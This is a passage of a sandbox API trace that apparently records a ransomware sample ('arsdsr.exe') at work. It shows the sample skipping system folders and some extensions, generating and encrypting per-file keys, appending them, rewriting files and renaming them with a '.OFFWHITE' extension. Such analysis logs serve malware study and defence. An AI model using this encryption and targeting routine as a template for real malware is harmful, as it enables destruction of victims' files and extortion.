lpString2="..") returned 1 [0086.654] lstrcmpiW (lpString1="AccLR.cab", lpString2="...") returned 1 [0086.654] lstrcmpiW (lpString1="AccLR.cab", lpString2="windows") returned -1 [0086.654] lstrcmpiW (lpString1="AccLR.cab", lpString2="$recycle.bin") returned 1 [0086.654] lstrcmpiW (lpString1="AccLR.cab", lpString2="rsa") returned -1 [0086.654] lstrcmpiW (lpString1="AccLR.cab", lpString2="ntuser.dat") returned -1 [0086.654] lstrcmpiW (lpString1="AccLR.cab", lpString2="programdata") returned -1 [0086.654] lstrcmpiW (lpString1="AccLR.cab", lpString2="appdata") returned -1 [0086.654] lstrcmpiW (lpString1="AccLR.cab", lpString2="program files") returned -1 [0086.654] lstrcmpiW (lpString1="AccLR.cab", lpString2="program files (x86)") returned -1 [0086.654] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\" [0086.654] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\", lpString2="AccLR.cab" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" [0086.654] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.654] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.654] PathFindExtensionW (pszPath="AccLR.cab") returned=".cab" [0086.654] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0086.654] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0086.654] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0086.654] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xfc0c60c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName="branding.xml", cAlternateFileName="")) returned 1 [0086.654] lstrcmpiW (lpString1="branding.xml", lpString2=".") returned 1 [0086.654] lstrcmpiW (lpString1="branding.xml", lpString2="..") returned 1 [0086.655] lstrcmpiW (lpString1="branding.xml", lpString2="...") returned 1 [0086.655] lstrcmpiW (lpString1="branding.xml", lpString2="windows") returned -1 [0086.655] lstrcmpiW (lpString1="branding.xml", lpString2="$recycle.bin") returned 1 [0086.655] lstrcmpiW (lpString1="branding.xml", lpString2="rsa") returned -1 [0086.655] lstrcmpiW (lpString1="branding.xml", lpString2="ntuser.dat") returned -1 [0086.655] lstrcmpiW (lpString1="branding.xml", lpString2="programdata") returned -1 [0086.655] lstrcmpiW (lpString1="branding.xml", lpString2="appdata") returned 1 [0086.655] lstrcmpiW (lpString1="branding.xml", lpString2="program files") returned -1 [0086.655] lstrcmpiW (lpString1="branding.xml", lpString2="program files (x86)") returned -1 [0086.655] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\" [0086.655] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\", lpString2="branding.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" [0086.655] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.655] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.655] PathFindExtensionW (pszPath="branding.xml") returned=".xml" [0086.655] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0086.655] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0086.655] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0086.655] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0086.655] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0086.655] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0086.655] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0086.655] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0086.655] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0086.655] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0086.655] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0086.655] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0086.655] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0086.656] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0086.656] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0086.656] lstrcmpiW (lpString1="branding.xml", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0086.656] GetProcessHeap () returned 0x500000 [0086.656] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547cd8 [0086.656] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0086.657] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=596341) returned 1 [0086.657] GetProcessHeap () returned 0x500000 [0086.657] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0086.657] GetProcessHeap () returned 0x500000 [0086.657] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0086.657] GetProcessHeap () returned 0x500000 [0086.657] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0086.657] GetProcessHeap () returned 0x500000 [0086.657] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0086.657] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.657] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.657] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0086.657] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.657] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.657] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0086.657] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.658] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.658] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295dc90*=0x100) returned 1 [0086.658] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.658] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.658] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0086.659] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x91975, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.659] SetLastError (dwErrCode=0x0) [0086.659] WriteFile (in: hFile=0x214, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0086.823] GetLastError () returned 0x0 [0086.823] GetLastError () returned 0x0 [0086.823] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x91a75, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.824] WriteFile (in: hFile=0x214, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0086.824] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x91b75, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.824] WriteFile (in: hFile=0x214, lpBuffer=0x547cd8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x547cd8*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0086.824] GetProcessHeap () returned 0x500000 [0086.824] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x91975) returned 0x2960020 [0086.824] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.824] ReadFile (in: hFile=0x214, lpBuffer=0x2960020, nNumberOfBytesToRead=0x91975, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x2960020*, lpNumberOfBytesRead=0x295dec0*=0x91975, lpOverlapped=0x0) returned 1 [0086.892] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.892] WriteFile (in: hFile=0x214, lpBuffer=0x2960020*, nNumberOfBytesToWrite=0x91975, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x2960020*, lpNumberOfBytesWritten=0x295decc*=0x91975, lpOverlapped=0x0) returned 1 [0086.894] GetProcessHeap () returned 0x500000 [0086.894] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2960020 | out: hHeap=0x500000) returned 1 [0086.898] CloseHandle (hObject=0x214) returned 1 [0086.962] GetProcessHeap () returned 0x500000 [0086.962] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0086.962] GetProcessHeap () returned 0x500000 [0086.962] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0086.962] GetProcessHeap () returned 0x500000 [0086.962] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0086.962] GetProcessHeap () returned 0x500000 [0086.962] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0086.962] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" [0086.962] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.OFFWHITE" [0086.963] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.offwhite")) returned 1 [0086.963] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xfc0c60c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName="branding.xml", cAlternateFileName="")) returned 0 [0086.963] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0086.963] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa160f00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="AccessMUISet.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0086.963] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2=".") returned 1 [0086.963] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2="..") returned 1 [0086.963] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2="...") returned 1 [0086.964] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2="windows") returned -1 [0086.964] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2="$recycle.bin") returned 1 [0086.964] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2="rsa") returned -1 [0086.964] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2="ntuser.dat") returned -1 [0086.964] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2="programdata") returned -1 [0086.964] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2="appdata") returned -1 [0086.964] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2="program files") returned -1 [0086.964] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2="program files (x86)") returned -1 [0086.964] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\" [0086.964] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\", lpString2="AccessMUISet.msi" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" [0086.964] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.964] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.964] PathFindExtensionW (pszPath="AccessMUISet.msi") returned=".msi" [0086.964] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0086.964] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0086.964] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0086.964] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0086.964] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0086.964] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0086.964] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0086.964] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0086.964] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0086.964] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0086.964] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0086.964] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0086.964] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0086.964] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0086.965] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0086.965] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="AccessMUISet.xml", cAlternateFileName="ACCESS~1.XML")) returned 1 [0086.965] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2=".") returned 1 [0086.965] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="..") returned 1 [0086.965] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="...") returned 1 [0086.965] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="windows") returned -1 [0086.965] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="$recycle.bin") returned 1 [0086.965] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="rsa") returned -1 [0086.965] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="ntuser.dat") returned -1 [0086.965] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="programdata") returned -1 [0086.965] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="appdata") returned -1 [0086.965] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="program files") returned -1 [0086.965] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="program files (x86)") returned -1 [0086.965] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\" [0086.965] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\", lpString2="AccessMUISet.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" [0086.965] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.965] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.965] PathFindExtensionW (pszPath="AccessMUISet.xml") returned=".xml" [0086.965] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0086.965] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0086.965] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0086.966] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0086.966] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0086.966] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0086.966] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0086.966] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0086.966] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0086.966] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0086.966] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0086.966] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0086.966] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0086.966] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0086.966] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0086.966] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0086.966] GetProcessHeap () returned 0x500000 [0086.966] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547ce8 [0086.966] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0086.966] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=819) returned 1 [0086.966] GetProcessHeap () returned 0x500000 [0086.966] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0086.967] GetProcessHeap () returned 0x500000 [0086.967] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0086.967] GetProcessHeap () returned 0x500000 [0086.967] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0086.967] GetProcessHeap () returned 0x500000 [0086.967] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0086.967] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.967] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.967] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0086.967] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.967] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.967] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0086.967] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.967] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.967] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e310*=0x100) returned 1 [0086.967] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.967] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.967] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0086.968] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x333, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.968] SetLastError (dwErrCode=0x0) [0086.968] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0086.982] GetLastError () returned 0x0 [0086.982] GetLastError () returned 0x0 [0086.982] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x433, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.982] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0086.982] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x533, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.982] WriteFile (in: hFile=0x21c, lpBuffer=0x547ce8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547ce8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0086.982] GetProcessHeap () returned 0x500000 [0086.982] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x333) returned 0x53f480 [0086.982] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.982] ReadFile (in: hFile=0x21c, lpBuffer=0x53f480, nNumberOfBytesToRead=0x333, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x53f480*, lpNumberOfBytesRead=0x295e540*=0x333, lpOverlapped=0x0) returned 1 [0086.983] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.983] WriteFile (in: hFile=0x21c, lpBuffer=0x53f480*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f480*, lpNumberOfBytesWritten=0x295e54c*=0x333, lpOverlapped=0x0) returned 1 [0086.983] GetProcessHeap () returned 0x500000 [0086.983] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x53f480 | out: hHeap=0x500000) returned 1 [0086.983] CloseHandle (hObject=0x21c) returned 1 [0086.988] GetProcessHeap () returned 0x500000 [0086.988] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0086.988] GetProcessHeap () returned 0x500000 [0086.989] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0086.989] GetProcessHeap () returned 0x500000 [0086.989] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0086.989] GetProcessHeap () returned 0x500000 [0086.989] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0086.989] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" [0086.989] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.OFFWHITE" [0086.989] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), lpNewFileName="C:/MSOCache\\All 